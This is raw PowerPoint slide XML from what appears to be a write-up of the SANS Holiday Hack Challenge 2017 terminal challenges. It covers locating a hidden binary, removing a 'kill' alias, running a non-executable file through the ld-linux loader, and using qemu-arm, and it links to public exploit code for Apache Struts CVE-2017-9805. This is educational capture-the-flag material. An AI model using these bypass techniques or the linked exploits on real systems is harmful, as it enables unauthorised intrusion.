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9" r:id="rId3"/>
    <p:sldId id="263" r:id="rId4"/>
    <p:sldId id="384" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="264" r:id="rId9"/>
    <p:sldId id="265" r:id="rId10"/>
    <p:sldId id="266" r:id="rId11"/>
    <p:sldId id="269" r:id="rId12"/>
    <p:sldId id="313" r:id="rId13"/>
    <p:sldId id="270" r:id="rId14"/>
    <p:sldId id="271" r:id="rId15"/>
    <p:sldId id="272" r:id="rId16"/>
    <p:sldId id="273" r:id="rId17"/>
    <p:sldId id="314" r:id="rId18"/>
    <p:sldId id="315" r:id="rId19"/>
    <p:sldId id="274" r:id="rId20"/>
    <p:sldId id="316" r:id="rId21"/>
    <p:sldId id="318" r:id="rId22"/>
    <p:sldId id="275" r:id="rId23"/>
    <p:sldId id="319" r:id="rId24"/>
    <p:sldId id="320" r:id="rId25"/>
    <p:sldId id="317" r:id="rId26"/>
    <p:sldId id="321" r:id="rId27"/>
    <p:sldId id="276" r:id="rId28"/>
    <p:sldId id="322" r:id="rId29"/>
    <p:sldId id="277" r:id="rId30"/>
    <p:sldId id="278" r:id="rId31"/>
    <p:sldId id="279" r:id="rId32"/>
    <p:sldId id="323" r:id="rId33"/>
    <p:sldId id="324" r:id="rId34"/>
    <p:sldId id="280" r:id="rId35"/>
    <p:sldId id="325" r:id="rId36"/>
    <p:sldId id="327" r:id="rId37"/>
    <p:sldId id="331" r:id="rId38"/>
    <p:sldId id="332" r:id="rId39"/>
    <p:sldId id="281" r:id="rId40"/>
    <p:sldId id="330" r:id="rId41"/>
    <p:sldId id="329" r:id="rId42"/>
    <p:sldId id="328" r:id="rId43"/>
    <p:sldId id="333" r:id="rId44"/>
    <p:sldId id="282" r:id="rId45"/>
    <p:sldId id="334" r:id="rId46"/>
    <p:sldId id="356" r:id="rId47"/>
    <p:sldId id="382" r:id="rId48"/>
    <p:sldId id="335" r:id="rId49"/>
    <p:sldId id="336" r:id="rId50"/>
    <p:sldId id="359" r:id="rId51"/>
    <p:sldId id="357" r:id="rId52"/>
    <p:sldId id="337" r:id="rId53"/>
    <p:sldId id="360" r:id="rId54"/>
    <p:sldId id="358" r:id="rId55"/>
    <p:sldId id="338" r:id="rId56"/>
    <p:sldId id="383" r:id="rId57"/>
    <p:sldId id="355" r:id="rId58"/>
    <p:sldId id="342" r:id="rId59"/>
    <p:sldId id="343" r:id="rId60"/>
    <p:sldId id="344" r:id="rId61"/>
    <p:sldId id="347" r:id="rId62"/>
    <p:sldId id="350" r:id="rId63"/>
    <p:sldId id="348" r:id="rId64"/>
    <p:sldId id="349" r:id="rId65"/>
    <p:sldId id="351" r:id="rId66"/>
    <p:sldId id="362" r:id="rId67"/>
    <p:sldId id="364" r:id="rId68"/>
    <p:sldId id="363" r:id="rId69"/>
    <p:sldId id="365" r:id="rId70"/>
    <p:sldId id="366" r:id="rId71"/>
    <p:sldId id="367" r:id="rId72"/>
    <p:sldId id="370" r:id="rId73"/>
    <p:sldId id="371" r:id="rId74"/>
    <p:sldId id="372" r:id="rId75"/>
    <p:sldId id="376" r:id="rId76"/>
    <p:sldId id="373" r:id="rId77"/>
    <p:sldId id="374" r:id="rId78"/>
    <p:sldId id="375" r:id="rId79"/>
    <p:sldId id="377" r:id="rId80"/>
    <p:sldId id="378" r:id="rId81"/>
    <p:sldId id="379" r:id="rId82"/>
    <p:sldId id="381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135AEA9-4E8B-4640-83F9-DC22BCFB647E}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="259"/>
            <p14:sldId id="263"/>
            <p14:sldId id="384"/>
            <p14:sldId id="257"/>
            <p14:sldId id="258"/>
            <p14:sldId id="260"/>
            <p14:sldId id="264"/>
            <p14:sldId id="265"/>
            <p14:sldId id="266"/>
            <p14:sldId id="269"/>
            <p14:sldId id="313"/>
            <p14:sldId id="270"/>
            <p14:sldId id="271"/>
            <p14:sldId id="272"/>
            <p14:sldId id="273"/>
            <p14:sldId id="314"/>
            <p14:sldId id="315"/>
            <p14:sldId id="274"/>
            <p14:sldId id="316"/>
            <p14:sldId id="318"/>
            <p14:sldId id="275"/>
            <p14:sldId id="319"/>
            <p14:sldId id="320"/>
            <p14:sldId id="317"/>
            <p14:sldId id="321"/>
            <p14:sldId id="276"/>
            <p14:sldId id="322"/>
            <p14:sldId id="277"/>
            <p14:sldId id="278"/>
            <p14:sldId id="279"/>
            <p14:sldId id="323"/>
            <p14:sldId id="324"/>
            <p14:sldId id="280"/>
            <p14:sldId id="325"/>
            <p14:sldId id="327"/>
            <p14:sldId id="331"/>
            <p14:sldId id="332"/>
            <p14:sldId id="281"/>
            <p14:sldId id="330"/>
            <p14:sldId id="329"/>
            <p14:sldId id="328"/>
            <p14:sldId id="333"/>
            <p14:sldId id="282"/>
            <p14:sldId id="334"/>
            <p14:sldId id="356"/>
            <p14:sldId id="382"/>
            <p14:sldId id="335"/>
            <p14:sldId id="336"/>
            <p14:sldId id="359"/>
            <p14:sldId id="357"/>
            <p14:sldId id="337"/>
            <p14:sldId id="360"/>
            <p14:sldId id="358"/>
            <p14:sldId id="338"/>
            <p14:sldId id="383"/>
            <p14:sldId id="355"/>
            <p14:sldId id="342"/>
            <p14:sldId id="343"/>
            <p14:sldId id="344"/>
            <p14:sldId id="347"/>
            <p14:sldId id="350"/>
            <p14:sldId id="348"/>
            <p14:sldId id="349"/>
            <p14:sldId id="351"/>
            <p14:sldId id="362"/>
            <p14:sldId id="364"/>
            <p14:sldId id="363"/>
            <p14:sldId id="365"/>
            <p14:sldId id="366"/>
            <p14:sldId id="367"/>
            <p14:sldId id="370"/>
            <p14:sldId id="371"/>
            <p14:sldId id="372"/>
            <p14:sldId id="376"/>
            <p14:sldId id="373"/>
            <p14:sldId id="374"/>
            <p14:sldId id="375"/>
            <p14:sldId id="377"/>
            <p14:sldId id="378"/>
            <p14:sldId id="379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69"/>
    <p:restoredTop sz="94723"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="208" y="2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8663A-DE04-EF45-A757-7E00BB3031D6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45EB0-BCE2-824F-9535-7B7B407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42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fo.org/alias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uxthink.blogspot.com/2012/04/executing-arm-executable-in-x86-using.html" TargetMode="Externa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qlitetutorial.net/sqlite-group-by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en-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-class-ld-preload-for-the-wi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2017.holidayhackchallenge.com/" TargetMode="External"/><Relationship Id="rId3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2s.northpolechristmastown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northpolechristmastown.com/orders.xhtml" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mazen160/struts-pwn_CVE-2017-9805" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.northpolechristmastown.com/orders" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pen-testing.sans.org/blog/2017/12/05/why-you-need-the-skills-to-tinker-with-publicly-released-exploit-code" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/chrisjd20/cve-2017-9805.py/master/cve-2017-9805.py" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.northpolechristmastown.com/orders/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://l2s.northpolechristmastown.com/GreatBookPage2.pdf" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:alabaster_snowball@35.227.95.23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2s.northpolechristmastown.com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2s.northpolechristmastown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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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il.northpolechristmastown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esencryption.net/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mail.northpolechristmastown.com/attachments/GreatBookPage4_893jt91md2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2s.northpolechristmastown.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mail.northpolechristmastown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ppd.northpolechristmastown.com/infractions?query=name:*" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://json-csv.com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aas.northpolechristmastown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10.142.0.13/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.142.0.13/XMLFile/Elfdata.xml" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.142.0.13/Home/DisplayXML" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.142.0.13/Home/CreateElfs" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://eaas.northpolechristmastown.com/xMk7H1NypzAqYoKw/greatbook6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labaster_snowball@35.196.147.14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aas.northpolechristmastown.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://edb.northpolechristmastown.com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0.142.0.5/account.ht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db.northpolechristmastown.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://2017.holidayhackchallenge.com/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2017.holidayhackchallenge.com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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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Sans holiday hack </a:t>
            </a:r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collecting all the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6230"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Things to Unlock and Collect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74800"/>
            <a:ext cx="9905999" cy="492759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Terminal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Snowball Challenge Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Hints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Achievements</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Snowball </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Achievements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Great Book Pages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>CTF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Objectives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Great Book Pages</a:t>
            </a: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Terminal-Bushy  Evergreen - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FInd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr=" name is Bushy Evergreen, and I have a problem for you. &#10;think a server got owned, and I can only offer a clue. &#10;1 &#10;e us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t="1348" b="6997"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2254684" y="1114818"/>
            <a:ext cx="6855759" cy="547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0003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/>
              <a:t>Bushy  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Evergreen-Find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788" y="1315232"/>
            <a:ext cx="10860832" cy="49477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Problem - Cannot Execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>‘Find’ or ‘locate’, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>so cant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>locate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>elftalkd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> binary to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>is FIND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>?, What are known locations of FIND?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>/bin/find /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>/local/bin/find /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>/share/man/man1/find.1.gz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>/share/info/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>find.info.gz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>moved to /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/bin and executed './find / -name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>elftalkd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>found it at /run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>elftalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>elftalkd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>moved to directory and executed './</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>elftalkd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>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717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Terminal-Bushy  Evergreen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FInd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-SOLVED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="lf@993feb94b18c: &#10;elf@993feb94b18c: &#10;eittalkd &#10;elf@993feb94b18c: &#10;/usr/bin$ cd /run/elftalk/bin &#10;/ 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832" y="964504"/>
            <a:ext cx="6225436" cy="573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6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79" y="0"/>
            <a:ext cx="10420110" cy="147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Terminal -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Winconceiveaable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: the cliffs of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>winsanity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,' &#10;l,'/l//l &#10;jgs &#10;My name is Sparkle Redberry, and I need your help. &#10;My server is atwist, and I fear I may yelp. &#10;H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t="875" b="5856"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2642991" y="1427967"/>
            <a:ext cx="6864264" cy="53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10883574" cy="1440493"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Terminal -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Winconceiveaable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>: the cliffs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>winsanity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27550"/>
            <a:ext cx="9905999" cy="526093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Problem - Kill does not work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> aux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>kill 4224 , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>didnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> work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typed 'alias'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saw 'kill' command was aliased to 'true'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took hint and found </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.linfo.org/alias.html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used '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unalis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> kill'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then 'kill 8'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 err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> aux showed process had been killed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 err="1" smtClean="0"/>
              <a:t>Candycanestriper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7" name="Picture 1" descr=" jgs &#10;y name is Holly Evergreen, and I have a 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74" y="1131098"/>
            <a:ext cx="7509502" cy="515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 err="1" smtClean="0"/>
              <a:t>Candycanestriper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33856"/>
            <a:ext cx="10142284" cy="465734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Problem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> Execute a script without the execution permission bit set (+x)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>ls -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>ll</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>CandyCaneStriper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350" fontAlgn="ctr">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>/lib64/ld-linux-x86-64.so.2 /home/elf/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>CandyCaneStriper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> +x 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9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 err="1" smtClean="0"/>
              <a:t>Candycanestriper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6145" name="Picture 1" descr="1 11 &#10;/ jgs &#10;My name is Holly Evergreen, &#10;and I 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46" y="1225297"/>
            <a:ext cx="5609015" cy="52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8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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Theres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> snow place like </a:t>
            </a:r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9" name="Picture 1" descr="l—Il &#10;jgs _ &#10;y name is Pepper Minstix, and I need your help with my plight. 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906" y="1225296"/>
            <a:ext cx="7952070" cy="540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4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11927"/>
            <a:ext cx="9905999" cy="432261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Scope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Command Line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Main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Snowball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Answers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43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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Theres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> snow place like </a:t>
            </a:r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04316"/>
            <a:ext cx="6428711" cy="1402289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mr-IN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Execute a program designed for ARM </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8193" name="Picture 1" descr=" root root &#10;— rwx r—x r—x &#10;a, --all &#10;036 Dec &#10;3 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30"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="841945" y="2373334"/>
            <a:ext cx="10943844" cy="7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name -al &#10;Linux 7456251ac6a1 4.9.0-4-amd64 SMP Debian 4.9.65-3 (2017-12-03) GNU/Linux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46" y="3775623"/>
            <a:ext cx="10943844" cy="7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66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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Theres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> snow place like </a:t>
            </a:r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139724"/>
            <a:ext cx="8386635" cy="5133060"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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quick google 'how to run arm on x64system' led to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>found </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://tuxthink.blogspot.com/2012/04/executing-arm-executable-in-x86-using.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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ran '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>qemu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-arm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trainstartup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'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worked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90" y="3047598"/>
            <a:ext cx="6877747" cy="362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9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425"/>
            <a:ext cx="10370006" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Terminal-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Bumbles Bounce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o: &#10;lo: &#10;jgs &#10;o &#10;o &#10;:ol &#10;:ol &#10;o &#10;o &#10;inty Candycane here, I need your &#10;help straight away. &#10;e' re having an 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03" y="1052186"/>
            <a:ext cx="5323562" cy="546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7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425"/>
            <a:ext cx="10370006" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Terminal-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Bumbles Bounce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21728"/>
            <a:ext cx="9905999" cy="3541714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mr-IN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Data parsing </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11266" name="Picture 2" descr="Windows NT 6.1; WOW64; rv:49.0) Geck0/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912" y="1678488"/>
            <a:ext cx="8687005" cy="498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4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425"/>
            <a:ext cx="10370006" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
